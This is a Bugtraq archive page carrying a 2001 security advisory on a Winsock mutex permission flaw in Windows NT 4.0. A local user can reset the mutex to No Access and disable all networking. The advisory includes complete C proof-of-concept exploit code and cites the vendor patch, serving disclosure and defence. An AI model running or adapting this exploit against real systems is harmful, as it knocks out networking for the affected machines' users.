Home page logo
/

bugtraq logo Bugtraq mailing list archives

ntsecurity.nu advisory: Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below
From: Arne Vidstrom <arne.vidstrom () NTSECURITY NU>
Date: Fri, 26 Jan 2001 19:23:59 +0100

-- Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below --

Author:

Arne Vidstrom (arne.vidstrom () ntsecurity nu) - http://ntsecurity.nu


Severity:

Denial Of Service if the attacker is able to execute the exploit code under
any account on the system. Remote exploitation is not possible.


Details:

There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0, to
which the Everyone group has Full Control. Any user can change this to No
Access, and that disables all network connectivity through Winsock until the
system is rebooted.


Vendor Response:

Microsoft has released a patch and you can read more about it in their
Security Bulletin at
http://www.microsoft.com/technet/security/bulletin/ms01-003.asp.


Sample exploit code:

/*
/* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom () ntsecurity nu
/*                        http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/

#include <windows.h>
#include <aclapi.h>

int main(void)
{
        PSID pEveryoneSID;
        SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
        PACL pDacl;
        DWORD sizeNeeded;

        AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0,
0, 0, 0, &pEveryoneSID);
        sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
GetLengthSid(pEveryoneSID) - sizeof(DWORD);
        pDacl = (PACL) malloc(sizeNeeded);
        InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
        AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
        SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex",
SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
        free(pDacl);
        return 0;
}


  By Date           By Thread  

Current thread:
  • ntsecurity.nu advisory: Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below Arne Vidstrom (Jan 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault